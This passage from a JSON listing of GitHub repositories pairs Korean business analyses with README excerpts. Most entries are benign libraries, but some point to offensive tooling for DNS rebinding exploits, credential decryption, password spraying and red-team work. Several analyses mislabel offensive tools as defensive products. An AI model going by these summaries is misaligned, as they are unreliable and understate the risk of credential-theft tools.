환경**\n개발자들이 웹브라우저에서 Mac 가상 환경을 렌트해 사용하는 구독형","readme_excerpt":"## [HyperKit](http://github.com/moby/hyperkit)\n\n![Build Status macOS](https://circleci.com/gh/moby/hyperkit.svg?style=shield&circle-token=cf8379b302eab2bbf33821cafe164dbefb71982d)\n\n*HyperKit* is a toolkit for embedding hypervisor capabilities in your application. It includes a complete hypervisor, based on [xhyve](https://github.com/mist64/xhyve)/[bhyve](http://bhyve.org), which is optimized for lightweight virtual machines and container deployment.  It is designed to be interfaced with higher-level components such as the [VPNKit](https://github.com/moby/vpnkit) and [DataKit](https://github.com/moby/datakit).\n\nHyperKit currently only supports macOS using the [Hypervisor.framework](https://developer.apple.com/library/mac/documentation/DriversKernelHardware/Reference/Hypervisor/index.html). It is a core component of Docker Desktop for Mac.\n\n\n## Requirements\n\n* OS X 10.10.3 Yosemite or later\n* a 2010 or later Mac (i.e. a CPU that supports EPT)\n\n## Reporting Bugs\n\nIf you are using a versio","composite_score":0.5135,"license_safety_tag":"safe"},{"name":"assetnote/kiterunner","github_url":"https://github.com/assetnote/kiterunner","stars":6,"language":"Go","license":"AGPL-3.0","abandonment_months":25,"description":"# KiteRunner 상용화 분석\n\n## 왜 보물인가\n웹사이트의 숨겨진 API를 자동으로 찾아내는 보안 검사 도구로, 기업들이 자신의 시스템 취약점을 미리 발견할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객이 월 구독으로 자신의 웹사이트를 정기적으로 자동 검사받는 온라인 플랫폼\n- **내부 업무 도구**: 대형 I","readme_excerpt":"# Kiterunner\n\n![](/hack/kiterunner.png)\n\n[![GoDoc](https://godoc.org/github.com/assetnote/kiterunner?status.svg)](https://godoc.org/github.com/assetnote/kiterunner)\n[![GitHub release](https://img.shields.io/github/release/assetnote/kiterunner.svg)](https://github.com/assetnote/kiterunner/releases)\n[![Go Report Card](https://goreportcard.com/badge/github.com/assetnote/kiterunner)](https://goreportcard.com/report/github.com/assetnote/kiterunner)\n\n# Introduction\n\nFor the longest of times, content discovery has been focused on finding files and folders. While this approach is effective for legacy web servers that host static files or respond with 3xx’s upon a partial path, it is no longer effective for modern web applications, specifically APIs.\n\nOver time, we have seen a lot of time invested in making content discovery tools faster so that larger wordlists can be used, however the art of content discovery has not been innovated upon.\n\nKiterunner is a tool that is capable of not only perfo","composite_score":0.5135,"license_safety_tag":"risky"},{"name":"jaeles-project/jaeles","github_url":"https://github.com/jaeles-project/jaeles","stars":6,"language":"Go","license":"MIT","abandonment_months":25,"description":"# Jaeles 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아주는 도구로, 기업의 사이버 보안 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 점검 SaaS 서비스**: 중소 기업들이 매월 자신의 웹사이트 보안 상태를 자동으로 진단받는 구독 서비스\n2. **기업 내부 보안 도구**: 대기업의 IT 부서","readme_excerpt":"<p align=\"center\">\n  <img alt=\"Jaeles\" src=\"https://github.com/jaeles-project/jaeles-plugins/blob/master/assets/jaeles.png?raw=true\" height=\"140\" />\n  <p align=\"center\">\n    <a href=\"https://github.com/jaeles-project/jaeles/releases\"><img alt=\"Release\" src=\"https://img.shields.io/github/v/release/jaeles-project/jaeles.svg\"></a>\n    <a href=\"https://jaeles-project.github.io/\"><img alt=\"Documentation\" src=\"https://img.shields.io/badge/Documentation-📖-red.svg?style=flat-square\"></a>\n    <a href=\"\"><img alt=\"Software License\" src=\"https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square\"></a>\n  </p>\n</p>\n\n**Jaeles** is a powerful, flexible and easily extensible framework written in Go for building your own Web Application\nScanner.\n\n![Architecture](https://github.com/jaeles-project/jaeles-plugins/blob/master/imgs/jaeles-architecture.png?raw=true)\n\n\n## Installation\n\nDownload [precompiled version here](https://github.com/jaeles-project/jaeles/releases).\n\nIf you have a Go env","composite_score":0.5134,"license_safety_tag":"safe"},{"name":"codrops/StackMotionHoverEffects","github_url":"https://github.com/codrops/StackMotionHoverEffects","stars":500,"language":"HTML","license":"unknown","abandonment_months":112,"description":"# StackMotionHoverEffects 상용화 분석\n\n## 왜 보물인가\n웹사이트의 버튼이나 이미지에 마우스를 올렸을 때 부드럽게 움직이는 시각 효과를 쉽게 만들 수 있는 도구로, 웹사이트를 더 세련되고 전문적으로 보이게 해준다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**\n웹 디자인 플랫폼(Wix, Squarespace 경쟁사)에서 사용자가 ","readme_excerpt":"# Stack Motion Hover Effect\n\nExperimental hover effects that reveal a stack of multiple colored cards behind the hovered item, inspired by [Merci-Michel](http://www.merci-michel.com/projects/)\n\n[Article on Codrops](https://tympanus.net/codrops/?p=30373)\n\n[Demo](http://tympanus.net/Development/StackMotionHoverEffects/)\n\n## Credits\n\n- Idea based on the effect seen on the projects page of [Merci-Michel](http://www.merci-michel.com/projects/)\n- [Anime.js](http://anime-js.com/) by Julian Garnier\n- Images made with designs by [Freepik.com](http://www.freepik.com/free-vector/new-year-party-brochure-with-colorful-geometric-shapes_997206.htm)\n- Typeface [Overpass Mono](https://fonts.google.com/specimen/Overpass+Mono) by Delve Withrington\n\n\n## License\nThis resource can be used freely if integrated or build upon in personal or commercial projects such as websites, web apps and web templates intended for sale. It is not allowed to take the resource \"as-is\" and sell it, redistribute, re-publish it,","composite_score":0.5134,"license_safety_tag":"unknown"},{"name":"facebookresearch/vissl","github_url":"https://github.com/facebookresearch/vissl","stars":7,"language":"Jupyter Notebook","license":"MIT","abandonment_months":27,"description":"# VISSL 저장소 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이미지 인식 AI 학습 프레임워크로, 사진 속 물체를 자동으로 인식하는 능력을 컴퓨터에 가르칠 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 영상 분석 SaaS**: X-ray, MRI 사진을 자동 판독하는 의료기관용 웹 서비스로 월 구독료 수령\n2. **전자상거래 상품 분류 ","readme_excerpt":"<img src=\".github/logo/Logo_Color_Light_BG.png\" width=\"900\"/>\n\n[![CircleCI](https://circleci.com/gh/facebookresearch/vissl.svg?style=svg&circle-token=a0c1dfc4edf0ebe523700b95a563e74eb4d4e5a8)](https://circleci.com/gh/facebookresearch/vissl)[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/facebookresearch/vissl/blob/main/.github/CONTRIBUTING.md)\n\n## What's New\nBelow we share, in reverse chronological order, the updates and new releases in VISSL. All VISSL releases are available [here](https://github.com/facebookresearch/vissl/releases).\n- **[Feb 2022]**: Releasing [SEER 10B parameters](https://arxiv.org/abs/2202.08360) model [implementation and model weights](projects/SEER/README.md).\n- **[Feb 2022]**: Releasing [implementation of Fairness Benchmarks](projects/fairness_indicators/README.md) for computer vision models proposed in [the paper](http://arxiv.org/abs/2202.07603).\n- **[Jan 2022]**: [Implementation for Geolocalization test](https://g","composite_score":0.5133,"license_safety_tag":"safe"},{"name":"alxrm/audiowave-progressbar","github_url":"https://github.com/alxrm/audiowave-progressbar","stars":499,"language":"Kotlin","license":"MIT","abandonment_months":72,"description":"# audiowave-progressbar 평가 리포트\n\n## 왜 보물인가\n음악이나 팟캐스트 앱에서 재생 진행률을 시각적으로 예쁘게 보여주는 기술로, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 앱 (SaaS)**: Spotify나 유튜브뮤직 같은 서비스에 내장되어 사용자가 재생 위치를 한눈에 파악하게","readme_excerpt":"# Audiogram\n[![](https://jitpack.io/v/alxrm/audiowave-progressbar.svg)](https://jitpack.io/#alxrm/audiowave-progressbar)\n[![License](http://img.shields.io/badge/license-MIT-green.svg?style=flat)]()\n\nSuper lightweight audiowave progressbar written in Kotlin\n\n\n\n<img src=\"imgs/wave.gif\"/>\n\n\n## Getting started\n\nAdd to your root build.gradle:\n```Groovy\nallprojects {\n\trepositories {\n\t    ...\n\t    maven { url \"https://jitpack.io\" }\n\t}\n}\n```\n\nAdd the dependency:\n```Groovy\ndependencies {\n  implementation 'com.github.alxrm:audiowave-progressbar:0.9.2'\n}\n```\n\n## Attrs\n|attr|format|description|\n|---|:---|:---:|\n|waveColor|color|with this color chunks will be filled|\n|chunkWidth|dimension|every chunk will have this width|\n|chunkHeight|dimension|maximum height all the chunks can be|\n|minChunkHeight|dimension|minimum height all the chunks can be|\n|chunkSpacing|dimension|spacing between chunks|\n|chunkRadius|dimension|how much corners of every chunk will be rounded|\n|progress|float|should be 0..100, it","composite_score":0.5133,"license_safety_tag":"safe"},{"name":"edihbrandon/RictyDiminished","github_url":"https://github.com/edihbrandon/RictyDiminished","stars":499,"language":"","license":"unknown","abandonment_months":143,"description":"# RictyDiminished 프로젝트 분석\n\n## 왜 보물인가\n프로그래머들이 코딩할 때 사용하는 글꼴로, 가독성이 뛰어나 개발자 생산성을 높이는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: 코드 에디터나 IDE에 내장되는 프리미엄 글꼴 옵션으로 구독 수익화\n2. **기업 개발팀 라이선스**: 대규모 IT회사의 표준 개","readme_excerpt":"# プログラミング用フォント Ricty Diminished\n\nRicty Diminished (リクティ・ディミニッシュト) は [Ricty](https://github.com/yascentur/Ricty) の姉妹フォントであり、[Inconsolata](http://levien.com/type/myfonts/inconsolata.html) と [Migu 1M](http://mix-mplus-ipa.sourceforge.jp/) ではなく、[Inconsolata](http://levien.com/type/myfonts/inconsolata.html) と [Circle M+ 1m](http://mix-mplus-ipa.sourceforge.jp/) を Ricty 生成スクリプトで合成したフォントです。\nIPA ゴシックのグリフを含まないため、使用可能な漢字グリフの数が少ない代わり、[SIL Open Font License](http://scripts.sil.org/ofl) の下で配布が可能です。\n\n# 特徴\n\n* ラテン文字には Raph Levien 氏の Inconsolata が適用されます。\n* それ以外の文字には Circle M+ 1m が適用されます。美しい M+ と itouhiro 氏が改良された視認性の高い日本語文字 (半濁音など) が使用できます。\n* 半角文字と全角文字の横幅の比が 1:2 に調整されています。\n* 全角スペースが可視化されます。\n* いくつかの全角グリフが対応する半角グリフと差別化されています。\n* en ダッシュ、em ダッシュが破断線のようになります (LaTeX での入力ミス防止のため)。\n\n# ライセンス\n\n* Ricty Diminished は [SIL Open Font License (OFL) Version 1.1](http://scripts.sil.org/ofl) に従うものとします。\n\n# バージョン\n\n## Version 3.2.3 (4 May 2014)\n\n* [Ricty 生成スクリプト Version 3.2.3](https://github.com/yascentur/Ricty/tree/3.2.3)\n*","composite_score":0.5133,"license_safety_tag":"unknown"},{"name":"brannondorsey/dns-rebind-toolkit","github_url":"https://github.com/brannondorsey/dns-rebind-toolkit","stars":499,"language":"JavaScript","license":"MIT","abandonment_months":57,"description":"# DNS Rebind Toolkit 비즈니스 분석\n\n## 왜 보물인가\n네트워크 보안의 숨겨진 취약점을 찾아내는 도구로, 기업의 시스템을 무단 접근으로부터 보호하는 데 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 진단 SaaS**: 기업들이 자신의 네트워크 취약점을 자동으로 검사하도록 웹 플랫폼으로 제공\n2. **침입 테스트 서비스**:","readme_excerpt":"# DNS Rebind Toolkit\n\n[Demo](http://rebind.network) | \n[Security Advisory](https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325) | \n[Included Payloads](payloads/README.md) | \n[FAQ](FAQ.md)\n\n**DISCLAIMER: This software is for educational purposes only. This software should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.**\n\nDNS Rebind Toolkit is a frontend JavaScript framework for developing [DNS Rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) exploits against vulnerable hosts and services on a local area network (LAN). It can be used to target devices like Google Home, Roku, Sonos WiFi speakers, WiFi routers, \"smart\" thermostats, and other IoT devices. With this toolkit, a remote attacker can bypass a router's firewall and directly interact with devices on the victim's home network, exfiltrating private information and in some cases, even controlling the vulnerable devices the","composite_score":0.5133,"license_safety_tag":"safe"},{"name":"uknowsec/SharpToolsAggressor","github_url":"https://github.com/uknowsec/SharpToolsAggressor","stars":500,"language":"","license":"unknown","abandonment_months":76,"description":"# SharpToolsAggressor 상용화 분석\n\n## 왜 보물인가\n해킹 대비 업무를 자동화하는 전문가용 도구로, 보안 담당자들이 수작업으로 하던 방어 작업을 빠르게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **보안 관제 SaaS 서비스**: 기업의 네트워크 방어 상황을 자동으로 점검하고 리포트하는 클라우드 서비스\n2. **기업 보안팀","readme_excerpt":"## SharpToolsAggressor\n\n\n\n### SharpEventLog: Windows Login EventLog\n  Get Windows Login EventLog:Login success:4624 And Login Failure:4625\n  c# 读取登录过本机的登录失败或登录成功（4624，4625）的所有计算机信息，在内网渗透中快速定位运维管理人员。\n  https://github.com/uknowsec/SharpEventLog\n  \n### SharpWebScan: A Multi Port Web Title Scanner\n  https://github.com/RcoIl/CSharp-Tools/tree/master/SharpWebScan\n  \n  \n### SharpAVKB: GetWindowsAnti-VirusSoftware And GetWindowsKernelExploitsKB\n  Windows杀软对比和补丁号对比\n  https://github.com/uknowsec/SharpAVKB\n  \n  \n### SharpSQLTools: Command Line SQLTools\n  命令行版SQLTools\n  https://github.com/uknowsec/SharpSQLTools\n  \n  \n### SharpDecryptPwd: DecryptPwd:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager\n  对密码已保存在 Windwos 系统上的部分程序进行解析,包括：Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品（Xshell,Xftp)。\n  https://github.com/uknowsec/SharpDecryptPwd\n  \n  \n### SharpDomainSpray: SharpDomainSpray is a very simple password spraying tool written in .NET. It takes a password then finds users in the domain and attempts","composite_score":0.5132,"license_safety_tag":"unknown"},{"name":"oyjcodes/tour","github_url":"https://github.com/oyjcodes/tour","stars":498,"language":"Java","license":"unknown","abandonment_months":73,"description":"# oyjcodes/tour 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자에게 주요 기능을 단계별로 설명해주는 '투어 가이드' 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신입 사용자를 위한 온보딩 투어 기능이 포함된 프로젝트 관리 도구나 설계 프로그램 제공\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"# 旅游门户网站-课程设计作品\n博客地址：https://oyjcodes.github.io/\n## 一、项目背景\n```\n旅游业作为一个快速成长的服务行业，游客希望获取的旅游资源相比较以往而言更加的多样化。游客需求变化的同时对旅游网站信息化建设的要求也在不断的提高。各地旅游部门为了加快本土旅游业的发展，正在通过各种途径积极探索旅游业发展的新模式。在互联网和电子商务蓬勃发展的大背景下，通过互联网技术建立当地独具特色的旅游门户网站将有效的促进旅游资源的推广。无论是山水风光还是红色旅游资源，江西都具有自身的独特优势。如今旅游业的发展与互联网联系的更加密切，只有加快旅游业信息化发展的步伐，提高旅游业的信息化建设水平，江西旅游产业才能扩大知名度，紧跟信息化时代的发展步伐。传统的旅游服务信息化水平早已无法满足当下用户的多样化需求，管理效率相对低下，数据处理粗糙，信息共享闭塞等问题严重制约着旅游业的发展。旅游网站在整合不同的旅游资源方面具有自身的优势，它可以将以往分散的旅游资源，包括酒店、景区、特产商品等有效的整合分类。网站负责提供全面的旅游信息化服务，用户就不必为寻找不同的旅游资源而花费大量的时间，可以将精力集中用于良好的旅游体验上。这种服务模式在便利了游客出行的同时也实现了旅游资源利用率的最大化。各类服务资源在互补的同时也满足了用户多样化的需求，旅游服务信息化水平的提高在一定程度上会拉动旅游业的增长。利用时下热门的互联网技术打造江西省旅游门户网站，整合江西各大旅游资源。在充分考虑用户使用体验的基础上，实现用户游记发布、特产购买、景点查询等功能。有效提高江西旅游业的信息化服务水平。 \n```\n## 二、总体设计与实施方案\n```\n该系统最核心需要解决的问题是如何满足游客出行旅游多样化的需求。旅游业作为一个庞大的服务生态链，它涵盖的服务场景非常广泛。其中包括酒店、景区、交通等各大环节，不同的环节上对应着各自的服务场景。本网站系统最大的作用就是将这些分支服务有效的整合起来，让用户通过一个平台就可以获得各类旅游资源整合后所带来的更加高效、便捷的服务。游客借助这个平台可以更加方便的了解江西独特的旅游文化并且乐于去体验江西旅游资源所带来的旅行服务，从而达到促进江西旅游业发展的目标。\n```\n### 2.1 系统功能结构\n```\n根据旅游业的实际业务需求，方便游客对旅游资源的便捷获取并","composite_score":0.5132,"license_safety_tag":"unknown"},{"name":"CyberSecurityUP/Awesome-Red-Team-Operations","github_url":"https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations","stars":7,"language":"","license":"unknown","abandonment_months":46,"description":"# CyberSecurityUP/Awesome-Red-Team-Operations 분석\n\n## 왜 보물인가\n기업의 보안 약점을 찾아내는 방법들을 정리한 자료로, 사이버 보안 업체들이 고객 서비스 개선에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 보안 진단 플랫폼으로 월 구독형 서비스 제공\n- **내부 업무 도구*","readme_excerpt":"\n# Awesome-Red-Team-Operation\n\n\n# PenTest and Red Teams Tools by Joas and S3cur3Th1sSh1t\n\n## Powershell Scripts\n\n- https://github.com/S3cur3Th1sSh1t/WinPwn\n\n- https://github.com/dafthack/MailSniper\n\n- https://github.com/putterpanda/mimikittenz\n\n- https://github.com/dafthack/DomainPasswordSpray\n\n- https://github.com/mdavis332/DomainPasswordSpray \n\n- https://github.com/jnqpblc/SharpSpray\n\n- https://github.com/Arvanaghi/SessionGopher\n\n- https://github.com/samratashok/nishang\n\n- https://github.com/PowerShellMafia/PowerSploit\n\n- https://github.com/fdiskyou/PowerOPS\n\n- https://github.com/giMini/PowerMemory\n\n- https://github.com/Kevin-Robertson/Inveigh\n\n- https://github.com/MichaelGrafnetter/DSInternals\n\n- https://github.com/PowerShellEmpire/PowerTools\n\n- https://github.com/FuzzySecurity/PowerShell-Suite\n\n- https://github.com/hlldz/Invoke-Phant0m\n\n- https://github.com/leoloobeek/LAPSToolkit\n\n- https://github.com/n00py/LAPSDumper\n\n- https://github.com/sense-of-security/ADRecon\n\n- https://githu","composite_score":0.5132,"license_safety_tag":"unknown"},{"name":"willmcpo/body-scroll-lock","github_url":"https://github.com/willmcpo/body-scroll-lock","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":38,"description":"","readme_excerpt":"<p align=\"left\"> <img width=\"675\" src=\"https://raw.githubusercontent.com/willmcpo/body-scroll-lock/master/images/logo.png\" alt=\"Body scroll lock...just works with everything ;-)\" /> </p>\n\n## Why BSL?\n\nEnables body scroll locking (for iOS Mobile and Tablet, Android, desktop Safari/Chrome/Firefox) without breaking scrolling of a target element (eg. modal/lightbox/flyouts/nav-menus).\n\n_Features:_\n\n- disables body scroll WITHOUT disabling scroll of a target element\n- works on iOS mobile/tablet (!!)\n- works on Android\n- works on Safari desktop\n- works on Chrome/Firefox\n- works with vanilla JS and frameworks such as React / Angular / VueJS\n- supports nested target elements (eg. a modal that appears on top of a flyout)\n- can reserve scrollbar width\n- `-webkit-overflow-scrolling: touch` still works\n\n_Aren't the alternative approaches sufficient?_\n\n- the approach `document.body.ontouchmove = (e) => { e.preventDefault(); return false; };` locks the\n  body scroll, but ALSO locks the scroll of a t","composite_score":0.5132,"license_safety_tag":"safe"},{"name":"ShameCom/ShameCom","github_url":"https://github.com/ShameCom/ShameCom","stars":6,"language":"","license":"MIT","abandonment_months":48,"description":"# ShameCom 저장소 분석\n\n## 왜 보물인가\n저장소명과 극히 제한적인 정보(Stars 6개, 설명 없음)로 보아 **실제 용도를 파악하기 어려운 미성숙 프로젝트**이므로 현재로서는 보물이라 보기 어렵습니다.\n\n## 어디에 쓸 수 있나\n프로젝트 목적이 명확하지 않아 구체적인 활용 시나리오를 제시할 수 없습니다. 저장소의 README나 코드를 확인 후 ","readme_excerpt":"# 校招污点公司记录\n\n本账号及仓库专用于记录在校园招聘中的具有**污点行为**的公司。\n\n污点行为**包括**但不限于：毁意向书、毁两方协定、毁三方协定、试用期裁员、大量裁应届生。\n\n污点行为**不**包括：毁OC（除非大量）、试用期结束未通过（除非大批量蓄意）。\n\n本人是2021届应届毕业生，参加了2021届的秋招，看到了好多往年公司毁约却在第二年依旧简历爆满的情况。本仓库的设立旨在帮助正在进行校招或者即将参加校招的同学们提供一个参考以避雷，并不是说这些公司就再也不能投了，但是具有污点的公司仍然要被钉在校招的耻辱柱上，让他们知道所谓的弱势群体也不是一盘散沙。\n\n本仓库的主要信息来自于牛客等公开论坛（很多帖子都会被当场公关，但是互联网不会忘记，对于被删除的帖子，我会尽量提供快照），欢迎大家积极补充参与。\n\n| 公司 | 时间 | 事件 | 外链 | 长截图 |\n| :--- | :--- | :--- | :--- | :----- |\n| 竞技世界 | 2021/03/25 | 提前实习毁校招正式offer | [拿到校招正式offer，提前实习后却不给转正，怎么回事？](https://www.nowcoder.com/discuss/623405) | [拿到校招正式offer，提前实习后却不给转正，怎么回事？.png][拿到校招正式offer，提前实习后却不给转正，怎么回事？.png] |\n| 虎牙 | 2021/03/02 | 毁意向书 | [虎牙毁意向书，给各位找实习的师弟师妹提个醒](https://www.nowcoder.com/discuss/602477) | [虎牙毁意向书，给各位找实习的师弟师妹提个醒.png][虎牙毁意向书，给各位找实习的师弟师妹提个醒.png] |\n|高顿教育|2021/01/26|毁约|[高顿教育，最让我担心的事情还是让我摊上了](https://www.nowcoder.com/discuss/591473)|[高顿教育，最让我担心的事情还是让我摊上了](images/高顿教育，最让我担心的事情还是让我摊上了.png)|\n|多益网络|2020/12/02|寄三方或体检后被毁约|[本人寄三方后被毁约，打算签多益的看过来！！！](https://www.nowcoder.com/discuss/574772) <br>","composite_score":0.5131,"license_safety_tag":"safe"},{"name":"rasbt/stat453-deep-learning-ss21","github_url":"https://github.com/rasbt/stat453-deep-learning-ss21","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":52,"description":"# rasbt/stat453-deep-learning-ss21 분석\n\n## 왜 보물인가\n대학 강의 수준의 인공지능 교육 자료를 무료로 공개한 저장소로, 누구나 체계적으로 인공지능을 배울 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 인공지능 입문 과정을 구독형으로 판매하는 edX, 유데미 같은 서비스에 콘텐츠 제공\n","readme_excerpt":"# stat453-deep-learning-ss21\nSTAT 453: Intro to Deep Learning @ UW-Madison (Spring 2021)\n","composite_score":0.5131,"license_safety_tag":"safe"},{"name":"KyleGoddard/KGFloatingDrawer","github_url":"https://github.com/KyleGoddard/KGFloatingDrawer","stars":497,"language":"Swift","license":"MIT","abandonment_months":82,"description":"# KGFloatingDrawer 상용화 분석\n\n## 왜 보물인가\n앱 화면에서 옆쪽에서 슉 나타나는 메뉴 기능을 쉽게 만들어주는 도구로, 497명의 개발자가 이미 즐겨 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 제작 SaaS**: 코드 없이 앱을 만드는 서비스에 이 슬라이드 메뉴 기능을 기본 제공\n2. **사내 업무 앱 개발**: 중","readme_excerpt":"# KGFloatingDrawer\n\nKGFloatingDrawer is a reimplementation of\n[JVillella/JVFloatingDrawer](https://github.com/JVillella/JVFloatingDrawer) in\nSwift. A floating drawer style navigation. KGFloatingDrawer provides a unique\ntwist on the nav drawer pattern.\n\n![](https://github.com/KyleGoddard/KGFloatingDrawer/blob/master/kgfloatingdrawer_github_preview.gif)\n\n#Update\n\nCurrently working on updating this for Swift 3 and to take care of some of the reported issues.\n\n#Usage\n\n```swift\nfunc prepareDrawerViewController() -> KGDrawerViewController {\n    let drawerViewController = KGDrawerViewController()\n\n    drawerViewController.centerViewController = drawerSettingsViewController()\n    drawerViewController.leftViewController = leftViewController()\n    drawerViewController.rightViewController = rightViewController()\n    drawerViewController.backgroundImage = UIImage(named: \"sky3\")\n\n    _drawerViewController = drawerViewController\n\n    return drawerViewController\n}\n```\n\n#Installation\n\nKGFloatingDrawer","composite_score":0.5131,"license_safety_tag":"safe"},{"name":"MoOx/compass-recipes","github_url":"https://github.com/MoOx/compass-recipes","stars":499,"language":"CSS","license":"MIT","abandonment_months":114,"description":"# Compass Recipes 분석\n\n## 왜 보물인가\n웹사이트의 디자인과 레이아웃을 쉽게 만들기 위한 검증된 설계 패턴 모음으로, 개발자들이 반복되는 작업을 빠르게 처리할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 도구 SaaS**: 웹 제작 플랫폼(Wix, 스퀘어스페이스 같은)에서 사용자가 선택할 수 있는 템플릿 라이브러리로 판매","readme_excerpt":"# Compass Recipes [![Build Status](https://secure.travis-ci.org/MoOx/compass-recipes.png)](http://travis-ci.org/MoOx/compass-recipes)\n\n# UNMAINTAINED\n\n> A series of Compass and Sass mixins and functions for creating delicious CSS effects.\n\n\n## Availables Recipes\n\n* **[Backgrounds](/tests/recipes/background/)** - Background patterns, gradients.\n* **[Color](/tests/recipes/color/)** Variables Names, advanced color functions like `brightness()` & color scheme functions\n* **[Effects](/tests/recipes/effect/)** - Visual effects like `glass`, `bevel`, `cutout` or `ribbon`\n* **[Form skins](/tests/recipes/form/skin/)** - Only one at the moment. Please add yours :)\n* **[Icon Fonts](/tests/recipes/icon-font/)** - Includes icon fonts helper and a few open source fonts as a compass extension ([more info](https://github.com/MoOx/compass-recipes/blob/master/templates/icon-fonts/README.md))\n* **[Image](/tests/recipes/image/)** - More image mixins (& functions) than Compass deserve (dimensions, inline, ","composite_score":0.5131,"license_safety_tag":"safe"},{"name":"kyzhouhzau/BERT-NER","github_url":"https://github.com/kyzhouhzau/BERT-NER","stars":5,"language":"Python","license":"MIT","abandonment_months":49,"description":"# BERT-NER 저장소 분석\n\n## 왜 보물인가\n문서나 텍스트에서 사람 이름, 지역명, 조직명 같은 중요한 정보를 자동으로 찾아내는 기술로, 수작업으로 하던 정보 추출을 AI가 대신할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 뉴스 기사 자동 분석 서비스**\n- 기사에서 주요 인물, 회사, 지역을 자동 태깅하고 추천하는 SaaS 제품\n\n**2.","readme_excerpt":"## For better performance, you can try NLPGNN, see [NLPGNN](https://github.com/kyzhouhzau/NLPGNN) for more details.\n\n# BERT-NER Version 2\n\n\nUse Google's BERT for named entity recognition （CoNLL-2003 as the dataset）. \n\nThe original version （see old_version for more detail） contains some hard codes and lacks corresponding annotations,which is inconvenient to understand. So in this updated version,there are some new ideas and tricks （On data Preprocessing and layer design） that can help you quickly implement the fine-tuning model (you just need to try to modify crf_layer or softmax_layer).\n\n### Folder Description:\n```\nBERT-NER\n|____ bert                          # need git from [here](https://github.com/google-research/bert)\n|____ cased_L-12_H-768_A-12\t    # need download from [here](https://storage.googleapis.com/bert_models/2018_10_18/cased_L-12_H-768_A-12.zip)\n|____ data\t\t            # train data\n|____ middle_data\t            # middle data (label id map)\n|____ output\t\t\t    # output (fi","composite_score":0.5131,"license_safety_tag":"safe"},{"name":"alicex2020/Chinese-Landscape-Painting-Dataset","github_url":"https://github.com/alicex2020/Chinese-Landscape-Painting-Dataset","stars":499,"language":"","license":"unknown","abandonment_months":67,"description":"# Chinese Landscape Painting Dataset 분석\n\n## 왜 보물인가\n중국 산수화 수천 장을 모아놓은 데이터로, 인공지능이 동양 미술 스타일을 학습하고 그림을 생성할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 미술 생성 웹서비스**\n- 사용자가 \"산수화 스타일로 그려줘\"라고 입력하면 AI가 자동으로 그림을 만들어주는 서비","readme_excerpt":"<h1><u>Traditional Chinese Landscape Painting Dataset </u></h1>\n\n\n<b>Paper Title</b>: \"End-to-End Chinese Landscape Painting Creation Using Generative Adversarial Networks\"\\\n<b>ArXiv:</b> https://arxiv.org/abs/2011.05552 \\\n<b>Abstract:</b> \\\nCurrent GAN-based art generation methods produce unoriginal artwork due to their dependence on conditional input. Here, we propose Sketch-And-Paint GAN (SAPGAN), the first model which generates Chinese landscape paintings from end to end, without conditional input. SAPGAN is composed of two GANs: SketchGAN for generation of edge maps, and PaintGAN for subsequent edge-to-painting translation. Our model is trained on a new dataset of traditional Chinese landscape paintings never before used for generative research. A 242-person Visual Turing Test study reveals that SAPGAN paintings are mistaken as human artwork with 55% frequency, significantly outperforming paintings from baseline GANs. Our work lays a groundwork for truly machine-original art gener","composite_score":0.5131,"license_safety_tag":"unknown"},{"name":"venshine/AppUninstall","github_url":"https://github.com/venshine/AppUninstall","stars":498,"language":"C++","license":"Apache-2.0","abandonment_months":105,"description":"# AppUninstall 저장소 분석\n\n## 왜 보물인가\n스마트폰에서 앱을 깔끔하게 제거하는 기술을 제공하여, 휴대폰 관리 앱이나 보안 소프트웨어 회사들이 바로 활용할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **휴대폰 정리 앱 서비스**: 사용자가 불필요한 앱을 한 번에 삭제하는 기능을 제공하는 모바일 앱으로 운영\n2. **기업 기","readme_excerpt":"# Android App监听自身卸载，反馈统计\n\n## 方案\n1. 监听系统卸载广播：只能监听到其他应用的卸载广播，无法监听到自己是否被卸载。\n2. 读取系统log：第三方软件卸载无法得知。\n3. 静默安装另一个程序，监听自己是否被卸载：需要root权限。\n4. Java线程轮询，监听/data/data/{package-name}目录是否存在：卸载app，进程退出，线程也被销毁。\n5. C进程轮询，监听/data/data/{package-name}目录是否存在：目前业界普遍采用的方案。\n\n## 